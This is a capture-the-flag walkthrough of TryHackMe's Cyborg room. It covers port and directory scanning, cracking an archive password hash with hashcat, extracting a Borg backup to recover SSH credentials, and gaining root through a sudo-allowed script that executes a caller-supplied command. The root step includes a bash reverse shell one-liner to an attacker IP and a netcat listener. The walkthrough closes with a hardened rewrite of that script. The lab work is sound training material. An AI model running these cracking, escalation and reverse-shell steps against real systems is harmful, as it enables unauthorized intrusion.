Cyborg - TryHackMe

A box involving encrypted archives, source code analysis and more.
This is the write-up for TryHackMe's room named Cyborg. The room can be found here: https://tryhackme.com/room/cyborgt8
Enumeration
Deploy the box and run NMAP against the target IP.
NMAP
# Identify the list of services running on the target machine
sudo nmap -sS -Pn -T4 -p- 10.10.236.54

# Perform further information gathering on the open ports identified above
sudo nmap -O -A -Pn -T4 -p22,80 10.10.236.54

We have only 2 services running: SSH on port 22 and HTTP on port 80. This info is sufficient to answer the first 3 questions. The SSH version looks relatively new, so let's enumerate the web server further by running a gobuster scan.
Gobuster
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.236.54 -t 40

The gobuster scan above reveals a few more directories which we can browse manually via our favorite web browser. So let's take a look and check whether we can find anything interesting:



So we have a backup named "music_archive" which we can download as "archive.tar", along with a potential password for that archive. Sweet!
Untar the archive file and check whether we can find anything further:
tar -xvf archive.tar

Inside these directories we found a README file which tells us that it is a Borg Backup repository. More details here:

We can extract a Borg Backup repository and the details for that can be found here:
https://borgbackup.readthedocs.io/en/stable/usage/extract.html
Use this to install Borg on the Kali machine:
sudo apt install borgbackup
Extracting a Borg repository needs a passphrase, as the backups are encrypted. We found a hash above in the passwd file; maybe that is our passphrase, so let's try to crack it.
This is an Apache-style MD5 hash (apr1) and is supported by Hashcat. We can check it here:

So let's crack it using the rockyou wordlist: put the hash in crack.txt and use mode 1600:
hashcat -m 1600 crack.txt /usr/share/wordlists/rockyou.txt

And we found the plaintext for this hash, which we will use to extract the Borg archived repository.
borg extract /tmp/home/field/dev/final_archive::music_archive
Enter passphrase for key /tmp/home/field/dev/final_archive:
From the extracted repo we found a file named "note.txt" which contains the credentials for a user named "alex".

User.txt
We already know that SSH is enabled on the target, so let us use the credentials found above with SSH; user.txt can be found in the user's home directory:
ssh alex@10.10.63.130

Privilege Escalation
Our last task is to escalate our privileges to the root user and get the root flag. Let's check what our current user can run with sudo:
sudo -l

So user "alex" can run /etc/mp3backups/backup.sh as anyone without a password. The room description gives us a hint that we need to do source code analysis, so let's read the backup.sh shell script:
#!/bin/bash
sudo find / -name "*.mp3" | sudo tee /etc/mp3backups/backed_up_files.txt

input="/etc/mp3backups/backed_up_files.txt"
#while IFS= read -r line
#do
#a="/etc/mp3backups/backed_up_files.txt"
# b=$(basename $input)
#echo
# echo "$line"
#done < "$input"

while getopts c: flag
do
case "${flag}" in
c) command=${OPTARG};;
esac
done

backup_files="/home/alex/Music/song1.mp3 /home/alex/Music/song2.mp3 /home/alex/Music/song3.mp3 /home/alex/Music/song4.mp3 /home/alex/Music/song5.mp3 /home/alex/Music/song6.mp3 /home/alex/Music/song7.mp3 /home/alex/Music/song8.mp3 /home/alex/Music/song9.mp3 /home/alex/Music/song10.mp3 /home/alex/Music/song11.mp3 /home/alex/Music/song12.mp3"

# Where to backup to.
dest="/etc/mp3backups/"

# Create archive filename.
hostname=$(hostname -s)
archive_file="$hostname-scheduled.tgz"

# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
echo

# Backup the files using tar.
tar czf $dest/$archive_file $backup_files

# Print end status message.
echo
echo "Backup finished"

cmd=$($command)
echo $cmd
The script seems to be archiving files under /home/alex/Music, but if we look closely at the getopts block and the final cmd=$($command) line, we can pass a command line argument with the '-c' flag and it gets executed as a command. Since this script can be run as anybody via sudo, we will run it as root:
sudo -u root /etc/mp3backups/backup.sh -c "/bin/bash"
and then a reverse shell:
bash -i >& /dev/tcp/10.8.98.192/9999 0>&1
Catch the reverse shell on Kali to get root access and the root flag:
nc -nlvp 9999
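
The root cause here is a sudo-permitted script that evaluates caller-supplied text (cmd=$($command)) and builds its tar command from unquoted variables. Below is a hardened rewrite of the same backup logic, added as an example for this write-up rather than code from the room: it accepts no arguments at all, keeps the source and destination fixed (MP3_SOURCE and MP3_DEST are constructed defaults that mirror the room's paths), quotes every expansion, and passes file names NUL-separated so names with spaces cannot be split into extra arguments. It assumes GNU or BSD tar, which both understand --null -T -.

```shell
#!/bin/bash
# Hardened replacement for the room's backup.sh (added example, not the original).
# Fixes versus the vulnerable script:
#   * no -c option: caller-supplied text is never executed as a command
#   * source and destination are fixed, not taken from the caller
#   * every expansion is quoted; the file list travels NUL-separated to tar

MP3_SOURCE="${MP3_SOURCE:-/home/alex/Music}"   # constructed default, mirrors the room
MP3_DEST="${MP3_DEST:-/etc/mp3backups}"        # constructed default, mirrors the room

# A script runnable via sudo should expose no caller-controlled input it does
# not strictly need. Any argument at all is rejected.
refuse_arguments() {
    if [ "$#" -ne 0 ]; then
        echo "backup.sh takes no arguments (got: $*)" >&2
        return 1
    fi
    return 0
}

# Archive every .mp3 below $1 into $2/<hostname>-scheduled.tgz.
# Prints the absolute archive path on success, returns 1 on any failure.
safe_backup() {
    src="$1"
    dest="$2"
    [ -d "$src" ] || { echo "source directory missing: $src" >&2; return 1; }
    mkdir -p "$dest" || return 1
    host=$(hostname -s 2>/dev/null || echo localhost)
    archive="$(cd "$dest" && pwd)/$host-scheduled.tgz"

    # Refuse to produce an empty archive rather than silently "succeeding".
    count=$(find "$src" -type f -name '*.mp3' | wc -l | tr -d ' ')
    if [ "$count" -eq 0 ]; then
        echo "no .mp3 files under $src" >&2
        return 1
    fi

    # Paths are emitted NUL-separated by find and read by tar with --null -T -,
    # so spaces or shell metacharacters in file names are never re-parsed.
    ( cd "$src" && find . -type f -name '*.mp3' -print0 \
        | tar czf "$archive" --null -T - ) || return 1
    echo "$archive"
}

# Number of members in an archive, used to confirm what was actually backed up.
archive_count() {
    tar tzf "$1" | wc -l | tr -d ' '
}

main() {
    refuse_arguments "$@" || exit 1
    out=$(safe_backup "$MP3_SOURCE" "$MP3_DEST") || exit 1
    echo "Backup finished: $out ($(archive_count "$out") files)"
}

# Run main only when executed as backup.sh, so the functions can also be sourced.
if [ "${0##*/}" = "backup.sh" ]; then
    main "$@"
fi
```

With this version, sudo -l still grants alex the script, but there is no longer any path from an argument to an executed command; the remaining risk is confined to what tar does with files under the fixed source directory, which is the behaviour the script was supposed to have.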

That's it. Hope you enjoyed reading the write-up. This was an easy-rated room, but the new learning from it is Borg, which is a deduplicating archiver with compression and authenticated encryption.